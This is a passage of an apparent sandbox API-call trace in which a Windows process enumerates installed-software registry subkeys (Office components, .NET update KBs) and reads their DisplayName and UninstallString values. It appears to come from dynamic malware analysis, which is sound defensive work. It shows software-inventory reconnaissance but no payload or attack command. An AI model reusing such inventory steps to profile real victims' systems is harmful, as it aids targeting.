lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791a60 [0146.644] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x1c, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791f88 [0146.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3f0) returned 0x47a1788 [0146.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a14e0 | out: hHeap=0x4780000) returned 1 [0146.644] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x1d, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0011-0000-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791c18 [0146.645] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x1e, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0015-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791b10 [0146.645] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x1f, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0016-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791c70 [0146.645] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x20, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0018-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791d20 [0146.645] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x21, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0019-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791cc8 [0146.645] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x22, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-001A-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791d78 [0146.645] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x23, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-001B-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791e28 [0146.645] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x24, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-001F-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2760 [0146.646] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x25, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-001F-040C-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a27b8 [0146.646] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x26, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-001F-0C0A-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2a20 [0146.646] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x27, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-002C-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a26b0 [0146.646] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x28, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0044-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2918 [0146.646] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x29, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-006E-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2708 [0146.646] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x2a, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2810 [0146.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x5e8) returned 0x47a2b88 [0146.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a1788 | out: hHeap=0x4780000) returned 1 [0146.647] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x2b, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2868 [0146.647] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x2c, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0090-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a28c0 [0146.647] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x2d, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-00A1-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a29c8 [0146.647] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x2e, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-00BA-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2a78 [0146.647] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x2f, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-00E1-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2ad0 [0146.647] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x30, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-00E2-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2970 [0146.647] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x31, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0115-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2b28 [0146.648] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x32, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0117-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a20d8 [0146.648] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x33, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-012B-0409-0000-0000000FF1CE}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a24f8 [0146.648] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x34, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2130 [0146.648] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x35, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2658 [0146.648] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x36, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2600 [0146.648] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x37, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1e70 [0146.648] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x38, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a21e0 [0146.648] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x39, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a2290 [0146.648] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x3a, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x47a12b0 [0146.648] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x3b, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x47a1328 [0146.649] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x3c, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x47a13a0 [0146.649] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x3d, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x47a1418 [0146.649] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x3e, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x47a3650 [0146.649] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x3f, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x47a31a0 [0146.649] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8d0) returned 0x47a3d80 [0146.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a2b88 | out: hHeap=0x4780000) returned 1 [0146.650] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x40, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47a2b88 [0146.650] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x41, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x47a1ec8 [0146.650] RegEnumKeyExW (in: hKey=0x220, dwIndex=0x42, lpName=0xdedac, lpcchName=0xdeda8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0xdeda8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0146.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.650] RegOpenKeyExW (in: hKey=0x220, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x224) returned 0x0 [0146.650] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e7a8 [0146.651] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0cf0 | out: hHeap=0x4780000) returned 1 [0146.651] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e08 [0146.651] RegQueryValueExW (in: hKey=0x224, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x74, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.651] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e08 | out: hHeap=0x4780000) returned 1 [0146.651] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a4c00 [0146.651] RegQueryValueExW (in: hKey=0x224, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x60, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.652] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4c00 | out: hHeap=0x4780000) returned 1 [0146.652] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x24) returned 0x479a740 [0146.652] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798c90 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e30 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e08 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2c) returned 0x47a49d0 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c00 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xc) returned 0x479ee08 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c50 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798a90 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x28) returned 0x479a8f0 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798b70 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798ad0 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47a0c78 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798bb0 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798af0 [0146.653] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.653] RegQueryValueExW (in: hKey=0x224, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0cf0 | out: hHeap=0x4780000) returned 1 [0146.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d90 [0146.654] RegQueryValueExW (in: hKey=0x224, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.654] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d90 | out: hHeap=0x4780000) returned 1 [0146.654] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bb0 [0146.655] RegQueryValueExW (in: hKey=0x224, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.655] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0bb0 | out: hHeap=0x4780000) returned 1 [0146.656] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d90 [0146.656] RegQueryValueExW (in: hKey=0x224, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.656] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d90 | out: hHeap=0x4780000) returned 1 [0146.656] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bb0 [0146.656] RegQueryValueExW (in: hKey=0x224, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0bb0 | out: hHeap=0x4780000) returned 1 [0146.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e898 [0146.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e7c8 [0146.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e908 [0146.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e8d8 [0146.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e868 [0146.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e7d8 [0146.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e8a8 [0146.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8a8 | out: hHeap=0x4780000) returned 1 [0146.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7d8 | out: hHeap=0x4780000) returned 1 [0146.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e868 | out: hHeap=0x4780000) returned 1 [0146.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8d8 | out: hHeap=0x4780000) returned 1 [0146.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e898 | out: hHeap=0x4780000) returned 1 [0146.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e908 | out: hHeap=0x4780000) returned 1 [0146.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0146.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c28 [0146.658] RegQueryValueExW (in: hKey=0x224, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c28 | out: hHeap=0x4780000) returned 1 [0146.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ac0 [0146.658] RegQueryValueExW (in: hKey=0x224, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x19, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ac0 | out: hHeap=0x4780000) returned 1 [0146.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a740 | out: hHeap=0x4780000) returned 1 [0146.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798c90 | out: hHeap=0x4780000) returned 1 [0146.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c78 | out: hHeap=0x4780000) returned 1 [0146.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e08 | out: hHeap=0x4780000) returned 1 [0146.660] HeapFree (in: hHeap=0x4780000, 